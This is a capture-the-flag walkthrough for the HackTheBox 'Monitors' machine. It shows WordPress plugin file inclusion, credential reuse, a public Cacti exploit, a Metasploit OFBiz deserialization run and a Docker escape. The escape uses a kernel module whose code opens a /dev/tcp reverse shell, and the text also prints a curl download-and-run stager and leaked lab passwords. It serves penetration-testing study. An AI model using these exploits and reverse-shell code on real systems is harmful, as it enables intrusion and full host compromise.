Monitors - [HTB]



Monitors is a hard, OSCP-like Linux machine from HackTheBox where you will exploit several web application vulnerabilities until you obtain the user's credentials. Finally, you will have to escape from a Docker container by abusing one of its capabilities in order to become root.


As always, let's start by finding all open ports on the machine with nmap.

kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt
Nmap scan report for
Host is up (0.048s latency).
Not shown: 65533 closed ports
22/tcp open  ssh
80/tcp open  http

# Nmap done at Sat Jul 24 13:44:49 2021 -- 1 IP address (1 host up) scanned in 55.04 seconds

Then we continue with a deeper scan of every open port to get more information about each service.

kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80
Nmap scan report for
Host is up (0.047s latency).

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Accessing port 80, we get a message telling us that the web server cannot be reached directly by IP.

direct ip access is not allowed

Adding the domain from the email address, monitors.htb, to the /etc/hosts file, we can access the following WordPress page.


Enumerating with wpscan, we can list the installed plugins.

$ wpscan --url http://monitors.htb/ -e ap,u,cb
[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 | Found By: Urls In Homepage (Passive Detection)
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

The wp-with-spritz plugin has a known LFI / RFI vulnerability.


Thanks to this vulnerability we can read local files, which lets us obtain the users registered on the system.

marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

Furthermore, we can obtain the WordPress database credentials and another virtual host domain.

/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf

Adding the domain cacti-admin.monitors.htb to /etc/hosts, we can access the Cacti login form.


We can log in as admin with the MySQL database password (it is reused for the Cacti admin account).

Cacti version 1.2.12 has a public exploit that allows us to obtain a reverse shell as the user www-data.

kali@kali:~/Documents/HTB/Monitors$ python3 -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost --lport 443
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:ac3fbf8f5163e68c4ded3c22646f2ca5a6c3961b,1627157074
[+] Trying to log in...
[+] Successfully logged in!

[+] SQL Injection:

[+] Check your nc listener!
kali@kali:~/Documents/HTB/Monitors$  nc -lnvp 443
listening on [any] 8787 ...
connect to [] from (UNKNOWN) [] 36118
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation 1

Enumerating the file system, we find a Cacti backup service unit that executes a script inside marcus's home folder.

www-data@monitors:/$ find / -name "cacti*" 2>/dev/null
www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service

Reading that script, we can obtain a password.

www-data@monitors:/home/marcus/.backup$ cat /home/marcus/.backup/


zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name}${backup_name}.zip
rm /tmp/${backup_name}.zip

This password is reused for the marcus account, so we can switch to that user and read the user flag.

www-data@monitors:~$ su marcus
Password: VerticalEdge2020
marcus@monitors:~/.backup$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitors:~$ cat user.txt

Privilege Escalation 2

Running linpeas shows port 8443 listening on localhost only.

tcp        0      0*               

We can reach it using SSH local port forwarding.

kali@kali:~/Documents/HTB/Monitors$ ssh marcus@ -L -fN

Accessing the forwarded port with Firefox over HTTPS, we get a Tomcat error page that reveals the Tomcat version (9.0.31). Looking for associated vulnerabilities, we find the Metasploit module apache_ofbiz_deserialization.

msf6 > use exploit/linux/http/apache_ofbiz_deserialization
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lport 4444
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set forceexploit true
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > show options

Module options (exploit/linux/http/apache_ofbiz_deserialiation):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run

[*] Started reverse TCP handler on 
[*] Executing automatic check (disable AutoCheck to override)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
[*] Using URL:
[*] Local IP:
[+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/RXsgDGlc${IFS};chmod${IFS}+x${IFS}/tmp/RXsgDGlc;/tmp/RXsgDGlc;rm${IFS}-f${IFS}/tmp/RXsgDGlc
[*] Client (curl/7.64.0) requested /re6R4gMz4969w
[*] Sending payload to (curl/7.64.0)
[*] Command Stager progress - 103.95% done (158/152 bytes)
[*] Sending stage (36 bytes) to
[*] Command shell session 1 opened ( -> at 2021-07-25 18:54:45 +0200
[*] Server stopped.

uid=0(root) gid=0(root) groups=0(root)

Now we are root inside a Docker container that has been granted some interesting capabilities.

root@77ff21ad5db2:/tmp/temp# capsh --print
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)

Among them, CAP_SYS_MODULE stands out: it allows the container to load kernel modules into the shared host kernel, which lets us become root on the host by following this post.

Getting to the point, you need to create the following files inside the container (you can also host them on your Kali machine and download them from there).

Note: do not forget to change the IP to your Kali machine's address, and the indentation in the Makefile MUST be tabs.

root@77ff21ad5db2:/tmp/temp# cat reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("LKM reverse shell module");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/ 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
/* call_usermodehelper() spawns a user-space process from kernel context,
   so the command above runs as root on the host when the module loads */
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

root@77ff21ad5db2:/tmp/temp# cat Makefile
obj-m += reverse-shell.o

all:
	make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules

clean:
	make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean

Then run make in the directory where the files are stored; you should get the following output.

root@77ff21ad5db2:/tmp/temp# make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp/temp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/temp/reverse-shell.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /tmp/temp/reverse-shell.mod.o
  LD [M]  /tmp/temp/reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'

Finally, listen with nc on port 4445 and load the module with insmod.

root@77ff21ad5db2:/tmp/temp# insmod reverse-shell.ko
insmod reverse-shell.ko

kali@kali:~/Documents/HTB/Monitors$ nc -nlvp 4445
listening on [any] 4445 ...
connect to [] from (UNKNOWN) [] 37878
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/# cat /root/root.txt